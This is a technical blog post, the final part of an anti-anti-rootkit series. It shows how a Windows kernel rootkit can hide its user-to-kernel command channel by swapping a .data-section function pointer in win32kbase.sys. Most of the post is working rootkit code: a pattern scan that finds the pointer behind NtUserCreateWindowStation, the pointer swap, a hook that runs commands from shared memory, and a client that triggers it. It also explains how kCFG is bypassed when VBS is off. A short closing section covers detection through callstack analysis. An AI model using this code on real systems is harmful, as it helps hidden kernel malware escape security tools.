(Anti-)Anti-Rootkit Techniques - Part III: Hijacking Pointers

In Part II of this series, we looked at how we could be hiding our rootkit's thread from the eyes of a vigilant anti-rootkit, by tampering with the PspCidTable and subsequently, how an anti-rootkit can detect such tampering. In this final part of the trilogy, we will get rid of the main thread in our rootkit and will be implementing a "threadless" (of course you can not execute code without a thread, but threadless in the sense of not having a looping thread) user-to-kernel communication that is essentially immune against most detections of this kind.

User-To-Kernel Communications

As discussed in the previous parts, we can neither use IOCTLs nor a looping kernel thread that pools e.g. a shared memory object for commands, as that is both detected by our anti-rootkit. But if we can not use those, how do we initiate a call from userland (from our rootkit control client) into kernel code?

Well, you are doing exactly that, each time you are executing an Nt* syscall wrapper - you set up arguments and you enter a syscall interrupt, which transfers control to the kernel. What we could do is thus to do a simple trampoline hook on the respective kernel-level code in the driver's .text section, which then transfers control to our rootkit. But that is almost as noisy as full "driver stomping" and can be detected with the same simple integrity checks discussed in Part II.

But what if that driver calls a function pointer from a section, which is more likely to change, and thus harder to run integrity checks on, such as the .data section? Luckily (for us) there are some drivers which call kernel functions from pointers in the .data section. All we need to do is to swap a single pointer in a section that might be subject to memory change anyway, and we can redirect the control flow to our rootkit. This user-to-kernel communication method is known in the game cheating community as a .data ptr swap and fits all our boxes.

The .data ptr swap

The .data section contains all static variables and is usually subject to change at runtime, as opposed to (usually) read-only segments such as .rodata or .text. Functions that can be initiated from userland and call a function pointer stored in the .data segment can be found anywhere, but one driver that is known to contain many of them is the session driver Win32k.sys and (on modern systems) win32kbase.sys and win32kfull.sys. These drivers handle all the GUI/GDI related NtGdi* and NtUser* syscall wrappers.

How do we find a pointer to swap? (Kernel) Control Flow Guard (kCFG) actually gives us a handy pointer towards finding them. Let's look at one example function in win32k.sys which calls a function stored as a pointer in the .data section:

It moves a .data ptr into rax, validates if the pointer is NULL, and if it is not, we see it calling __guard_dispatch_icall_fptr_. In pseudocode:

__int64 (*NtUserBeginLayoutUpdate())(void)
{
  result = example_data_ptr;
  if ( example_data_ptr )
    return (__int64 (*)(void))example_data_ptr(); // `__guard_dispatch_icall_fptr_`
  return result;
}

__guard_dispatch_icall_fptr_ is a call inserted by kCFG that checks whether a function pointer is a valid target (by checking if it is in the kCFG bitmap) and blocks the execution if it is not. This in turn means, that by simply xref-ing calls to this function, we get a handy list of all .data pointers in a driver!

Ok now you might be thinking (and so was I), isn't this hijacking exactly what kCFG is supposed to prevent? Well, technically you are right, but if Virtualization Based Security (VBS) is disabled, the check is essentially bypassed (see e.g. here) and kCFG only checks if an address is a valid kernel address and not a usermode one. With VBS being enabled by default on newer Windows instals, but only if specific hardware requirements are met, there is definitely a chance that it is disabled on a workstation or, more likely, some server. Otherwise, a kCFG bypass would be needed.

We can verify that kCFG is essentially bypassed if VBS is disabled by looking at the implementation/decompilation of __guard_dispatch_icall_fptr_ in ntoskrnl.exe in IDA:

__int64 __fastcall guard_dispatch_icall()
{
  ULONG_PTR fptr; // rax

  // check if it is a usermode address
  if ((fptr & 0x8000000000000000uLL)  0LL)
    goto USERMODE_ADDR_DETECTED; // Invoke bugcheck (BSOD)

  // Validate guard_icall_bitmap (0 if no VBS)
  if (guard_icall_bitmap) 
  {
    // CFG logic [ ... ]
  }

  // [ ... ]

  // Validate retpoline_image_bitmap (0 if no VBS)
  if (retpoline_image_bitmap) 
  {
    // CFG logic [ ... ]
  }

  // Execute our function pointer
  return ((__int64 (*)(void))fptr)();
}

We can validate that both bitmaps are NULL on a system without VBS using WinDbg:

So kCFG is not going to be in our way, assuming we do not have a hardened environment with VBS.

Looking for more pointers

However, while the example NtUserBeginLayoutUpdate call is good to showcase the .data pointer concept, it is actually not well suited for our use case, because the function is not exported and not easy to write a signature for, because many functions in that driver look alike (being just a wrapper for a .data ptr). But now that we got the concept down, let us look at win32kbase.sys and look for more.

We can start by simply xref-ing calls to __guard_dispatch_icall_fptr_ which gets us a handy list of all .data pointers in this driver. Filtering for Nt we find all of those that we can call from usermode with a call to a an NtUser* or an NtGdi* function. Functions starting with Api* are also good targets, because many of the Nt* functions wrap a round one of those. Now we have a list of potential targets for our communication method:

Of course, some of these functions will validate their arguments before getting to the call we want to hijack, so we could try to look for those where the offset from the function start to the kCFG call is a low value (to keep reverse engineering efforts low) and then reverse them to understand how we can get through to the .data pointer call.

At first I was looking only for functions pointers that take arguments, so that I could pass parameters to the kernel, which is necessary if we want to execute something more nuanced. Unfortunately, we can not just populate the registers, call the routine and then read them from the kernel, as the kernel context only copies over those arguments that are needed. This info is stored in the KiArgumentTable of the KeServiceDescriptorTable<Shadow> aka the SSDT. That is why many public implementations rely on pointers with arguments (e.g. https://github.com/Guyy99/data-ptr-driver or https://github.com/0mWindyBug/DataptrHooks) - here you pass a magic value and a command block as one parameter and then, in your hook, check if the magic value is present and, if it is, parse the command block and execute the respective functions. While this approach works great, I wanted something slightly different.

Synthesis

By combining this technique with the shared memory technique from Part I, we can use ANY pointer, regardless of the amount of arguments - we just write our command into the shared memory section and let the hooked pointer trigger the rootkit to poll the command from this buffer. Really, any IPC method would work; we might as well also simply write into a file somewhere and read it from the driver.

This little twist greatly increases the amount of functions we can choose. If we hook a function that is called in a certain interval by Windows anyway, we would not even need a client anymore - we could just write the command into a file and wait til the hooked Nt* routine is calling our pointer. However, I wanted something to trigger manually, so I went with one of the many NtUser* functions that wrap an ApiSet* routine, namely NtUserCreateWindowStation, which simply wraps ApiSetEditionCreateWindowStationEntryPoint:

The .data pointer in ApiSetEditionCreateWindowStationEntryPoint is invoked after only one simple check, IsEditionGetProcessWindowStationEntryPointSupported, which on my version of Windows returns true. Any call to that routine will thus invoke the pointer and with that, my rootkit code.

Now, to extract the address of the pointer we just sigscan for it (see Part I and Part II of this series for an explanation). As the ApiSet* routine starts immediately after the NtUser* call, we do not have to resolve its address first but can start from NtUserCreateWindowStation. This time I even bothered to implement a dedicated function with a mask (yay) so the sigscanning is much easier (as always, error handling excluded for brevity):

// 
// Resolve NtUserCreateWindowStation
//
PVOID funcAddr = Memory::EvscGetSystemRoutineAddress(L"win32kbase.sys", "NtUserCreateWindowStation");

// 
// Find the dataPtr
//
ULONG_PTR dataPtrPattern = (ULONG_PTR)Memory::EvscFindPattern(
    (PVOID)(funcAddr),
    200, 
    "\x48\x8B\x05\x00\x00\x00\x00\x48\x85\xC0", 
    "xxx????xxx"
);

// Apply offset to get address of the .data ptr
g_dataPtrAddress = dataPtrPattern + offset + 3 + 4;
}

With the address of our pointer, we can simply exchange it with a pointer to our hook:

// 
// Swap with our hook and save original in g_pOriginalFunction
//
*(PVOID*)&g_pOriginalFunction /* cursed cast */ = _InterlockedExchangePointer((PVOID*)g_dataPtrAddress, HookedFunction);

In the hook function we can then poll for a command payload in a shared memory object, and, if we got a new command (where the executed flag is not set), we execute it (If you wanna look at how to setup a shared memory object and map it in a driver, see Banshee's source code).

INT HookedFunction(int a1, int a2, int a3, int a4, int a5, __int64 a6, __int64 a7, int a8)
{
    DbgPrint("[*] Hook triggered\r\n");

    if (ExGetPreviousMode() == UserMode && g_pSharedMemory)
    {
        KAPC_STATE apc = { 0 };
        KeStackAttachProcess(g_pWinlogon, &apc);

        // Read command payload
        PAYLOAD payload = *(PAYLOAD*)g_pSharedMemory;
        DbgPrint("[*] Got command: %i\r\n", payload.cmdType); // here you could execute e.g. callback remove, process elevation etc
        (*((PAYLOAD*)g_pSharedMemory)).executed = 1; // mark as executed
        (*((PAYLOAD*)g_pSharedMemory)).status = 0; // return status

        KeUnstackDetachProcess(&apc);
    }

    return g_pOriginalFunction(a1, a2, a3, a4, a5, a6, a7, a8);
}

Now we can write a simple client that opens the shared memory, writes a payload to it and then triggers the hook by calling our NtUser* function from earlier (either directly or, for stability, through legitimate winapi usage):

// Create file mappings for command shared memory region
HANDLE hMapFile = OpenFileMappingW(FILE_MAP_ALL_ACCESS, FALSE, L"Global\\Rootkit");
PAYLOAD* pSharedBuf = (PAYLOAD*)MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(PAYLOAD));

// Write command to shared mem
PAYLOAD payload = { 0 };
payload.cmdType = CMD_LOG_MESSAGE;
RtlCopyMemory(pSharedBuf, &payload, sizeof(PAYLOAD));

// Trigger hook by calling a function that ends up calling our NtUser* routine 
HWINSTA hWinSta = CreateWindowStationA(
    "MyWinStation",
    0,
    WINSTA_ALL_ACCESS,
    NULL
);

// Wait for execution and get status
while (!pSharedBuf->executed)
    Sleep(1000);
std::cout << "[*] Status: " << pSharedBuf->status << std::endl;

That's it! Now we have a Usermode-To-Kernel IPC that is not dependent on any continously running system thread, which could be easily detected by an anti-rootkit:

I uploaded the PoC code here.

Detection vectors

The intuitive approach to detecting these techniques would be to look up all the possible .data pointers in the standard Windows drivers and have an anti-rootkit check whether they point to memory backed by a driver. While this might be somewhat feasible for pointers with parameters, checking all pointers would be a tough endeavour, as we do not rely on parameters, when using this shared memory technique. Also, pointer chains can be used, so that only the last one points to the rootkit, so an anti-rootkit would need to walk the whole chain. And as soon as signed & benign third-party drivers with hijackable pointers come into play, the amount of pointers grows exponentially, making this approach even more pointless.

However, all callstack based detections from Part I, especially the NMI based approach, are still valid. Callstacks that start in userland, calling e.g. an NtUser* function and ending up in an unbacked kernel memory region could indicate a potential rootkit communication routine and can get our rootkit detected.

Still, we definitely reduced the detection surface of our driver, as a system thread pointing to our memory only runs when the rootkit code actually needs to be executed, by simply exchanging a pointer in the .data section of a benign driver.

While this concludes my trilogy on (anti-)anti-rootkit measures, there is much more to discover and explore which one could talk about. For now, I have other things to discover, and my son will be saying Hello World in a month :) But maybe I will get back to this series some day for a part IV or V.

Until then,

Happy Hacking!

Credits

Thanks to Ido Veltzmann and 0xWindyBug for answering some questions about kCFG <3